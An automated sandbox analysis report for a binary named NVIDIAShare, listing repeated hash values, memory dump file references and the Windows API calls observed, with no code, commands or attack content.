                                                            • Instruction ID: 752f7042f31c51b78c0ccc0818ba6546e2cc9061ea4376466ba587d658735294
                                                            • Opcode Fuzzy Hash: 60724046d42dcf0146637d10dda6f31e514f02c62f38a124a0285aa7955cd054
                                                            • Instruction Fuzzy Hash: 73C147729183418FC354CF29D88065AFBE2BFC8208F19892DE9D8DB311D734E949DB96
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0101F3A5), ref: 0101F9DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 51366c172b3b3be880f8c42bae8656c027fdfeca031f8cf555cf94c686fd7b3c
                                                            • Instruction ID: f3e361959f6a4ff04e6f11a12ddb433cc666aa249d1544aae616b5a751f8af56
                                                            • Opcode Fuzzy Hash: 51366c172b3b3be880f8c42bae8656c027fdfeca031f8cf555cf94c686fd7b3c
                                                            • Instruction Fuzzy Hash:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: f9f1c2bed15b44f839f0c6247bb41c9584460cb63a71212a500cbf4f9e6b509d
                                                            • Instruction ID: c73d31279be93d2b3240f60ee4e351777b17dde0149cdc0c34fbd81bee411ab1
                                                            • Opcode Fuzzy Hash: f9f1c2bed15b44f839f0c6247bb41c9584460cb63a71212a500cbf4f9e6b509d
                                                            • Instruction Fuzzy Hash: DC118671E047069EE7698F5DD4557AABBE4BB04710F14C82EE5EBE3688C279A180CF00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 544a1257402eaa7d5b1d74b5e2a583496d349f09e7f55f9f7bded46059a595af
                                                            • Instruction ID: 3e735b2a76f39c126791840c5d54c00fb7c4107a881289deb42e9d21441d9f7b
                                                            • Opcode Fuzzy Hash: 544a1257402eaa7d5b1d74b5e2a583496d349f09e7f55f9f7bded46059a595af
                                                            • Instruction Fuzzy Hash: F1A02430101100CFC310CF30574C30C37FC75041C13050015F0C4C4014D77D44505700
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction ID: 62cccbdc43b68e477a311087bd8f9b71023535ee7635053a3305f203a3706297
                                                            • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction Fuzzy Hash: 7D62F4716047858FCB25CF28C8906F9BBE1BF95304F08896ED8DA8B34AD779E545CB11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction ID: ce37d6de703377c768d4322ab93539e7aeac476b3c343bd4677707ed6ae07d6e
                                                            • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction Fuzzy Hash: C062C7716083498FCB15CF28C8905B9BBE1BF95304F0889AEEDDA8B34AD734E945CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction ID: d6b1ed628d37114219d5566661900bf6946cc371e29045e585847e90bea51173
                                                            • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction Fuzzy Hash: 77524C72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE99597255D334EA19CB86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8aa9073c077dd5454fc41fc2e35bbf441b9493b9c46813b017af83cb97d3bd00
                                                            • Instruction ID: 5ef0859d00099ad22d0cfae520f2a026f276146373d0e16c491d919c685d5cad
                                                            • Opcode Fuzzy Hash: 8aa9073c077dd5454fc41fc2e35bbf441b9493b9c46813b017af83cb97d3bd00
                                                            • Instruction Fuzzy Hash: 4412D0B06047068FC729CF28C890AB9B7E1FF98304F14892EE9D6C7785E778A595CB45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b76781ff3390ba8bc4293c8fad1f38852517afb9157594c4fdb3c970368d963
                                                            • Instruction ID: 0db611fa1acf40e78918e1be0f439bb13950e3b9f46c10fe9b27baa3b9622239
                                                            • Opcode Fuzzy Hash: 8b76781ff3390ba8bc4293c8fad1f38852517afb9157594c4fdb3c970368d963
                                                            • Instruction Fuzzy Hash: 64F1AA716083018FF35ACE28CA8866EBBE1EF89314F154BAEF5C597291D730E9458B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 868f39b16884fb11f40edc9db978b3127d72f6f615bb4d612f0cf766dc335042
                                                            • Instruction ID: 1295bdb183c298edae024026743835133a9c81a3da7a28f0726a572f251ba9b8
                                                            • Opcode Fuzzy Hash: 868f39b16884fb11f40edc9db978b3127d72f6f615bb4d612f0cf766dc335042
                                                            • Instruction Fuzzy Hash: 0FD1E571A083418FDB25DF28C84079BBBE1BF89308F08456DF9C99B24AD779E944CB56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cdf1e483d80e8f7f718a73129c6964be52e9647d7628bf0892bb62da8054e69
                                                            • Instruction ID: e63063db3da6cc0b46d332e89f6e7d38fbf5936b342dfb87937630a6827fb1f8
                                                            • Opcode Fuzzy Hash: 3cdf1e483d80e8f7f718a73129c6964be52e9647d7628bf0892bb62da8054e69
                                                            • Instruction Fuzzy Hash: DAE16DB95083948FD315CF19D98046BBFF0AF9A300F49095EF9C497352D236EA19DB92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction ID: 0e71baa4b98d31938451221d1f045e8a8be1f53dc6e5eb7497dead484dbbf9dc
                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction Fuzzy Hash: CD9143B030034A8BEB25EE68D894BFE77D5EBA0304F54092DEAD6C72C5DB789585C351
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 17ebbe5ab46b511d7d505b565235103b9e696ffff0de12b763c1e5597a2c27b6
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 1E815C713443468BEB25DE68C8D0BFD77D4AB94308F04092DEAC6CB69ADF7885858752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
                                                            • Instruction ID: 2a4a1d2b4c88d1a333736881aae1f1735f2a194d99cc3c33aeb41a62722d7bb2
                                                            • Opcode Fuzzy Hash: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
                                                            • Instruction Fuzzy Hash: 0561A83160073966EBB89A6C6C947FE63D4EB13210F04959AFAC3DF2C1D691D84A861D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction ID: 340b8eb8a6e8c06bbba6cc4c00c2b3dd21337ad6c37c58b72ddc8bd1a5eedc0b
                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction Fuzzy Hash: 26518860300B3557EFB9456C8C99FFF2BC99B52200F58089AEBC3CB692D609E545C39E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
                                                            • Instruction ID: 287d4bb29ec43ab5b54c119976bc638c3fb83d547fa010fd75acc0070a46dedc
                                                            • Opcode Fuzzy Hash: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
                                                            • Instruction Fuzzy Hash: C851C4315093964FE723CF28C5844EEBFE0AE9A614F490999F4D95B283C221D68ADB52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
                                                            • Instruction ID: 304fd4cdbcefe9943b6cee2b0913a5a491fa50279448c3f6362cff1b06abbfaf
                                                            • Opcode Fuzzy Hash: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
                                                            • Instruction Fuzzy Hash: BB51DEB1A087159FC748CF19D48055AF7E1FB88324F058A2EF899E3340D735E999CB9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: b87aa642bf52f93208661ed39b590bc995cefb1abea06ad5cf7fd95ba50059f3
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: 2831E4B17147468FDB55DF28C8502AABBE0FB95314F44452DE4C5DB341CB38E90ACB91
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0100E30E
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                              • Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4
                                                            • _strlen.LIBCMT ref: 0100E32F
                                                            • SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
                                                            • GetWindowRect.USER32(?,?), ref: 0100E3C9
                                                            • GetClientRect.USER32(?,?), ref: 0100E3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0100E475
                                                            • GetWindowRect.USER32(?,?), ref: 0100E4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 0100E4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 0100E4E3
                                                            • GetWindow.USER32(?,00000005), ref: 0100E4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 0100E51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 0100E58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
